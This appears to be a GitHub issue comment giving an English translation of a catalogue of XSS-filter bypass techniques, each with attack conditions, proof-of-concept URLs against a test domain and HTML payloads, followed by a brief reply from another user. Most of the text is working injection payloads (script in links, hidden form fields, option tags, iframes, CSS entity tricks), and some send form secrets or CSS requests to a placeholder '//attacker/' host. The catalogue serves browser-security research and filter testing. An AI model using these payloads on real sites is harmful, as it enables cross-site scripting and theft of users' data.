Use of link functions within the same domain (including subdomains)

Conditions for attacking:

  1. Reflected XSS
  2. Create links to XSS pages on the same domain (including subdomains)

PoCs:

  • https://vulnerabledoma.in/bypass/same-domain-link.html
  • https://www.vulnerabledoma.in/bypass/same-domain-link.html
<a href="https://vulnerabledoma.in/bypass/text?q=<script>alert(1)</script>">Click HERE</a>

Bypass where arbitrary URL can be specified

Conditions for attacking:

  1. There are places where reflective XSS is possible in the link

supplement:

By double linking the vulnerable part and adding a referrer, you can create a link to a javascript: URL without triggering the XSS filter.

PoCs:

https://vulnerabledoma.in/bypass/link?q=?q=javascript%253Aalert(1)

<a href="?q=javascript%3Aalert(1)">Link</a>

If the state before submission to the vulnerable form can be maintained on the page

Conditions for attacking:

  1. Reflected XSS
  2. The state before submission to the vulnerable form can be maintained on the page of the same domain (including subdomains).

PoCs:

https://vulnerabledoma.in/bypass/form?q=%26%23x22%3B%3E%26%23x3C%3Bscript%3Ealert%26%23x28%3B1)%26%23x3C%3B/script%3E

<form action="form">
<input type="hidden" name="q" value="&#x22;>&#x3C;script>alert&#x28;1)&#x3C;/script>">
<input type="hidden" name="secret" value="a09d3ef0">
<input type="submit">
</form>

Using option tags

Conditions for attacking:

  1. There is XSS that can write arbitrary tags
  2. The XSS is inside an existing form

Reference URL:

  • https://html5sec.org/xssfilter/entities

PoCs:

https://vulnerabledoma.in/bypass/form3?q=%3Cbutton%20formaction=form3%3ECLICK%3Cselect%20name=q%3E%3Coption%3E%26lt%3Bscript%3Ealert(1)%26lt%3B/script%3E

<form action=submit>
<button formaction=form3>CLICK<select name=q><option>&lt;script>alert(1)&lt;/script>
</form>

Using an empty iframe

Conditions for attacking:

  1. There is XSS that can write arbitrary tags
  2. The page allows embedding in frames

supplement:

Creating an empty iframe with XSS and navigating a scripted URL to that frame causes a bypass due to the referrer of the vulnerable domain itself.

Reference URL:

  • http://www.cracking.com.ar/bugs/2016-07-14/

PoCs:

https://l0.cm/bypass/ieedge_iframe.html

<!-- Found by @magicmac2000 -->
<iframe onload="contentWindow[0].location='//vulnerabledoma.in/bypass/text?q=<script>alert(location)</script>'" src="//vulnerabledoma.in/bypass/text ?q=%3Ciframe%3E"></iframe>

Using formaction (getting information only)

Conditions for attacking:

  1. Reflected XSS
  2. You can write a new formaction attribute where you can submit an existing form content containing sensitive information.

PoCs:

https://vulnerabledoma.in/bypass/form?q=%22%3E%3Cbutton%20formaction=//attacker/%3E

<form action="form">
<input type="hidden" name="q" value=""><button formaction=//attacker/>">
<input type="hidden" name="secret" value="a09d3ef0">
<input type="submit">
</form>

Use of character-referenced strings in style (style description only)

Conditions for attacking:

  1. Reflected XSS
  2. Attackable with CSS

supplement:

Entity reference notation such as @, :, \,( that are part of the reaction string is not considered, so style blocks and attributes in SVG where entity reference notation is allowed Bypass occurs in value. In IE, not only attacks that read information with CSS, but in some cases scripts can be executed via behavior:url().

Reference URL:

  • https://twitter.com/0x6D6172696F/status/752190911879184384
  • http://www.businessinfo.co.uk/labs/talk/The_Sexy_Assassin.ppt
  • https://blog.innerht.ml/cascading-style-scripting/

PoCs:

https://vulnerabledoma.in/bypass/text?q=%3Csvg%3E%3Cstyle%3E%26commat%3Bimport'//attacker'%3C/style%3E

<svg><style>&commat;import'//attacker'</style>

https://vulnerabledoma.in/bypass/text?q=%3Csvg%3E%3Cstyle%3E@%26bsol%3B0069mport%27//attacker%27%3C/style%3E

<svg><style>@&bsol;0069mport'//attacker'</style>

(IE+IE10 mode only) https://vulnerabledoma.in/bypass/text?q=%3Cp%20style="behavior%26colon%3Burl('/bypass/usercontent/xss.txt')"%3Etest&xuac=10

<p style="behavior&colon;url('/bypass/usercontent/xss.txt')">

(IE+IE10 mode only) https://vulnerabledoma.in/bypass/text?q=%3Cp%20style="behavior:url%26lpar%3B'/bypass/usercontent/xss.txt')"%3Etest&xuac=10

<p style="behavior:url&lpar;'/bypass/usercontent/xss.txt')">

Past bypass

Published on Fixed Bypass Archive.

w1redch4d avatar Jan 10 '23 15:01 w1redch4d

@w1redch4d I don't think that adding it as a comment to an issue is really helpful. But thanks for the effort anyway. I hope that it will help those that don't know what Google Translate is and how to use it.

jcubic avatar Jan 10 '23 18:01 jcubic